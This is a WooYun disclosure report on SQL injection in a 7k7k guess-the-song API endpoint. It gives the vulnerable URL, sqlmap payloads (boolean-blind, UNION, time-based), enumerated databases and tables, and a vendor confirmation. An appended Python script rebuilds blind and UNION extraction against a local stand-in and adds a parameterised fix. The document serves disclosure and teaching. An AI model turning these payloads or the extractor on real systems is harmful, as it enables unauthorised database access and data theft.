Vulnerability details

Disclosure status:

2014-02-27: Details reported to the vendor, awaiting vendor response
2014-02-27: Vendor confirmed; details visible only to the vendor
2014-03-09: Details disclosed to core white hats and domain experts
2014-03-19: Details disclosed to regular white hats
2014-03-29: Details disclosed to intern white hats
2014-04-13: Details disclosed to the public

Summary:

SQL injection in a KK Guess-the-Song (KK猜歌) API endpoint of 7k7k (奇客星空)

Details:

http://api.cg.7k7k.com/contest/get_nearestplaylist.php?kk=2565412332&num=3

The kk parameter is injectable. The closing `')` and re-opening `('zAUu'='zAUu` in the payloads below show that the value is spliced into the query as a quoted string inside parentheses, so boolean-based blind, UNION and time-based techniques all work against it.

Proof of vulnerability:

sqlmap identified the following injection points with a total of 36 HTTP(s) requests:

---

Place: GET

Parameter: kk

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3



Type: UNION query

Title: MySQL UNION query (NULL) - 1 column

Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3

---

back-end DBMS: MySQL 5.0.11

available databases [3]:

[*] cgw_new

[*] information_schema

[*] test


Database: cgw_new

[65 tables]

+--------------------------------------------------+

| cgw_announcements |

| cgw_prod_activities_achievements_settings |

| cgw_prod_activities_achievements_settings_levels |

| cgw_prod_activities_dailytask_actions |

| cgw_prod_activities_dailytask_rewards |

| cgw_prod_activities_entries |

| cgw_prod_activity_center_activity |

| cgw_prod_activity_center_advert |

| cgw_prod_album |

| cgw_prod_bulletin_default_msg |

| cgw_prod_contest |

| cgw_prod_exp |

| cgw_prod_feeds_limit |

| cgw_prod_feeds_share |

| cgw_prod_hints |

| cgw_prod_home_info |

| cgw_prod_home_info_actions |

| cgw_prod_homepage_advert |

| cgw_prod_icon_center |

| cgw_prod_items |

| cgw_prod_logondays |

| cgw_prod_packs |

| cgw_prod_playlists |

| cgw_prod_shop |

| cgw_prod_signin_rewards |

| cgw_prod_singer |

| cgw_prod_songs |

| cgw_user_album |

| cgw_user_animation |

| cgw_user_board |

| cgw_user_contest |

| cgw_user_contest_log |

| cgw_user_daily_rank |

| cgw_user_dailytask_rewards |

| cgw_user_exinfo |

| cgw_user_exp_log |

| cgw_user_flower_info |

| cgw_user_friends |

| cgw_user_gifts |

| cgw_user_got_vip_award |

| cgw_user_homeinfo |

| cgw_user_info |

| cgw_user_items |

| cgw_user_items_log |

| cgw_user_logon_log |

| cgw_user_logondays_log |

| cgw_user_mobile |

| cgw_user_opponents |

| cgw_user_orderinfo |

| cgw_user_pay_log |

| cgw_user_playlists |

| cgw_user_playlists_log |

| cgw_user_points |

| cgw_user_points_log |

| cgw_user_record |

| cgw_user_send_flowers |

| cgw_user_settings |

| cgw_user_signin_log |

| cgw_user_signin_rewards |

| cgw_user_status |

| cgw_user_task_log |

| cgw_user_tournament |

| cgw_user_vipinfo |

| cgw_user_visit |

| cgw_user_weekly_rank |

+--------------------------------------------------+

Fix:

You know the drill: treat kk (and num) as integers, validate them server-side, and bind them as prepared-statement parameters instead of concatenating them into the SQL string.
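As an added example (not part of the original report or of 7k7k's code), the following Python script reproduces, against a constructed SQLite stand-in for the cgw_new database, what the sqlmap output above demonstrates: the query shape inferred from the payloads (kk sits inside quotes and parentheses), boolean-based blind extraction driven by the same `2565412332') AND ... AND ('zAUu'='zAUu` structure, the UNION payload with sqlmap's hex markers decoded (0x71656b7071 is "qekpq", 0x717a727671 is "qzrvq"), and a hardened handler that validates and binds both parameters. The table name is taken from the dump above; its columns, its rows and the query inside get_nearestplaylist.php are assumptions, and the MySQL-only pieces (CONCAT, the `#` comment, SLEEP) are swapped for SQLite equivalents, so the time-based payload is not reproduced.

```python
import sqlite3
import string

# Constructed stand-in for the cgw_new database: the table name comes from the
# dump in the report, the columns and rows are assumed for the demonstration.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cgw_prod_playlists (id INTEGER, kk TEXT, name TEXT)")
    db.executemany("INSERT INTO cgw_prod_playlists VALUES (?, ?, ?)", [
        (1, "2565412332", "playlist-a"),
        (2, "2565412332", "playlist-b"),
        (3, "1111111111", "secret-list"),
    ])
    return db

def vulnerable_lookup(db, kk, num):
    """Query shape inferred from the payloads (assumed, not the real PHP): kk
    lands inside quotes and parentheses, which is why sqlmap closes it with ')
    and re-opens with ('zAUu'='zAUu. Both parameters are concatenated."""
    sql = "SELECT name FROM cgw_prod_playlists WHERE (kk = '%s') LIMIT %s" % (kk, num)
    return [row[0] for row in db.execute(sql)]

def safe_lookup(db, kk, num):
    """Hardened handler: validate both parameters as integers and bind them,
    so attacker-controlled text is never parsed as SQL."""
    if not (kk.isdigit() and num.isdigit()):
        return ("400 Bad Request", [])
    rows = db.execute(
        "SELECT name FROM cgw_prod_playlists WHERE (kk = ?) LIMIT ?",
        (kk, int(num)),
    )
    return ("200 OK", [row[0] for row in rows])

def boolean_payload(predicate):
    """Same structure as the reported boolean-based blind payload, with an
    arbitrary predicate in place of 9018=9018."""
    return "2565412332') AND %s AND ('zAUu'='zAUu" % predicate

def blind_extract(oracle, expr, charset=string.ascii_lowercase + string.digits + "-", max_len=32):
    """Recover the value of SQL expression `expr` one character at a time from a
    true/false oracle, the inference sqlmap automates in boolean-based blind mode."""
    value = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(boolean_payload("substr((%s),%d,1)='%s'" % (expr, pos, ch))):
                value += ch
                break
        else:
            break  # no candidate matched: past the end of the string
    return value

# sqlmap's UNION payload wraps the extracted value in random markers so it can
# locate it in the response body; these are the hex literals from the report.
MARKER_PREFIX = bytes.fromhex("71656b7071").decode()  # 0x71656b7071 -> "qekpq"
MARKER_SUFFIX = bytes.fromhex("717a727671").decode()  # 0x717a727671 -> "qzrvq"

def union_payload(expr):
    """The report's UNION payload adapted for SQLite: '||' replaces CONCAT()
    and '-- ' replaces MySQL's '#' end-of-line comment."""
    return "-7098') UNION ALL SELECT '%s'||(%s)||'%s' -- " % (MARKER_PREFIX, expr, MARKER_SUFFIX)

def extract_between_markers(rows):
    """Pull the injected column out of the response, as sqlmap does."""
    for row in rows:
        if row.startswith(MARKER_PREFIX) and row.endswith(MARKER_SUFFIX):
            return row[len(MARKER_PREFIX):-len(MARKER_SUFFIX)]
    return None

def demo():
    db = make_db()
    # The oracle is simply "did the endpoint return any rows?"
    oracle = lambda kk: len(vulnerable_lookup(db, kk, "3")) > 0
    # The two probes sqlmap starts with: a true predicate and a false one.
    assert oracle(boolean_payload("9018=9018"))
    assert not oracle(boolean_payload("9018=9019"))
    target = "SELECT name FROM cgw_prod_playlists WHERE id=3"
    blind = blind_extract(oracle, target)
    union = extract_between_markers(vulnerable_lookup(db, union_payload(target), "3"))
    safe = safe_lookup(db, boolean_payload("9018=9018"), "3")
    return blind, union, safe

if __name__ == "__main__":
    print(demo())
```

`demo()` returns the same string recovered two ways, first by the slow character-by-character boolean oracle and then in a single UNION request, followed by the hardened handler rejecting the payload outright; the blind path is what sqlmap falls back to when the response carries no query output, which is why even an endpoint that returns nothing useful is still fully readable.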

Copyright notice: please credit the source when reposting. Neeke@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed at: 2014-02-27 16:26

Vendor reply:

Thanks to the white-hat author for the report. The vulnerability does exist and has been fixed; we will contact the author afterwards to send a small gift, and we hope to cooperate with white-hat researchers.

Latest status:

None yet
